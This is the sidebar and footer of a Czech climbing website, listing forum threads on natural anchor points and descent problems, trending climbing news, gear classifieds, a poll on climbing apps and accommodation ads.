Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Přírodní kotevní body a jejich použití pro jištěí, slanování... |

 Nové komentáře:
Re: Problém na sestupu | Re: Problém na sestupu | Re: Problém na sestupu | Re: Cesta Járy Vdolečka | Re: Cesta Járy Vdolečka | Re: Cesta Járy Vdolečka | Re: Cesta | Re: Problém na sestupu | Re: Problém na sestupu | Problém na sestupu |

 Kde to vře:
Ukrajinský top lezec Maksym Petrenko padl při obraně Ukrajiny (50)
Mára Holeček a Ondrej Húserka vylezli na vrchol Langtangu (29)
Video: Seb Bouin a Alain Robert lezou solo na mrakodrap v Paříži (22)
Will Bosi přelezl boulder Spots of Time a potvrdil klasu 9A (17)
MČR v rychlolezení (16)
Film: Adam Ondra a nejtěžší cesta Vysokých Tater Corona 10+/11- (15)
Secret Spot Bouldering 2024 pozvánka (12)
MČR v bouldru vyhráli Lukáš Mokroluský a Michaela Smetanová (5)
Marjan (4)
Expedice Máry Holečka na Langtang Lirung se chystá do stěny (4)

 Nově v inzerci:
druhý konec lana | Batoh Deuter Aircontact 65+10l | Z teplem | Hledám děvče do skal | koupím Zlagboard | Kalhoty MONTURA SKI STYLE PANTS Man vel.L | Nepromokavá bunda The North Face vel.L | Nové lezečky Scarpa Instinct VSR vel. 43,5 | Srbsko | boulder pytel EVOLV |

 Anketa:
Jaké technologie nebo aplikace používáte při lezení a jak vám pomáhají?
 GPS a mapové aplikace 
 361 
 Lezecké aplikace pro sledování výkonu 
 315 
 Sociální sítě pro sdílení a inspiraci 
 284 
 Vzdělávací aplikace pro techniky a trénink 
 286 
 Aplikace pro evidenci a sdílení výstupů 
 256 

 Návody:
Jak psát na lezce ...
Lezecké mapy

 Partneři:
Treking.cz
Hledáte si pěkné ubytování v ČR na Váš výlet či dovolenou? Vyberte si na webu MegaUbytko.cz v sekci chaty a chalupy pronájem. Pokud plánujete cestovat na Slovensko a potřebujete ubytovanie na Slovensku, ty nejlepší ubytovací zařízení, chaty, chalupy, roubenky naleznete na stránce chaty na prenájom.

 lezec  diskuse  ankety  odkazy  průvodce  fotky  video  *rss*  ochrana osobních údajů       ceník reklamy Energy Cloud   NetPro systems, s.r.o.